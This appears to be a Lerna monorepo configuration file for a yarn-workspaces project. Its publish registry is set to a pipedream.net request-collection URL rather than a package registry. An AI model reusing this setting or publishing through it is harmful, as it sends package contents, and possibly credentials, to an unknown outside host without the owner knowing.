{
  "npmClient": "yarn",
  "useWorkspaces": true,
  "packages": [
    "packages/*"
  ],
  "version": "0.0.1",
  "command": {
    "publish": {
      "registry": "https://eog9zpcpg1notbg.m.pipedream.net"
    }
  }
}
